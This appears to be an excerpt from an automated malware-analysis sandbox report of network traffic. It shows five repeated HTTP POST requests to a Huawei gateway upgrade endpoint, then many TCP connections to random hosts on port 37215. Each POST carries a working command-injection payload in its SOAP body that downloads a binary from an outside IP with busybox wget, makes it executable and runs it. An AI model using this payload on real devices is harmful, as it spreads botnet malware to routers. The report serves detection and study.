          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.51.144.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.91.137.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.38.180.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.157.212.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.18.57.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.120.172.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.79.195.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 120.82.116.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.88.164.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.171.240.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.193.22.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.102.217.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.183.175.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.141.128.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 155.230.161.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.25.224.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.122.115.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.19.73.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.5.115.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.28.224.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.231.0.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.47.38.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 92.37.56.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.56.0.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.8.146.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.35.187.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.81.103.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.101.202.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 213.128.219.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 99.138.91.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.248.109.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 193.117.98.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.213.207.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 61.148.151.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.33.230.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.234.10.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.55.147.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.184.221.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.147.100.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.201.119.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.146.203.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.16.36.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 147.203.32.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.11.65.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.170.214.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.59.163.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 183.9.177.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 59.35.85.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 36.163.108.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.177.90.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.99.205.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.54.190.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 31.150.50.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.168.170.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.106.170.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 189.18.29.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.144.211.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.219.192.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.55.226.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.89.74.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.19.239.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.209.76.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.92.58.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.188.71.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 110.130.116.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.222.60.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.15.100.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.122.22.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.155.190.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.18.240.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 115.155.75.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 82.245.165.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 222.186.16.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.163.68.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.240.254.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.254.176.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 115.239.103.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.116.248.106:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.142.0.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.100.137.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 158.32.13.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 206.83.152.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.189.166.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 45.51.153.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.217.29.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.125.80.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 36.23.109.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 222.6.115.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.66.96.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.243.119.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 158.34.191.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.215.210.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.94.125.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 109.212.49.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.37.13.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.163.252.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.240.151.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.160.133.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.62.138.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.231.148.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.38.85.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.191.203.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.213.43.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 2.232.199.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 175.109.180.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.234.86.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.126.68.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 13.254.192.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.72.237.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 88.87.1.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.18.82.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.69.0.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 150.170.7.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.27.153.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 114.144.176.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.49.237.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.92.106.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.229.91.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.163.150.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.185.25.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.61.7.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.162.121.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.225.192.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.38.128.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.13.75.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.229.111.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.238.147.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 14.172.125.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.213.204.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.8.129.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.110.229.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.104.79.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.200.135.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.101.111.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.109.105.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.191.201.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.29.114.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.51.7.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.250.51.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.13.55.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.245.200.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 101.25.173.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 211.6.17.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.40.138.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.161.172.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.75.210.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.255.0.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 180.123.30.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.183.247.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.142.254.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.139.140.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 204.25.75.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.102.230.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 66.62.243.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.4.118.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.123.18.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 45.89.156.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.99.246.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.116.209.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.192.230.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.18.157.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.248.98.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.182.228.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.153.118.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.121.240.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.114.203.50:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.122.33.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.210.152.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 104.139.237.74:37215
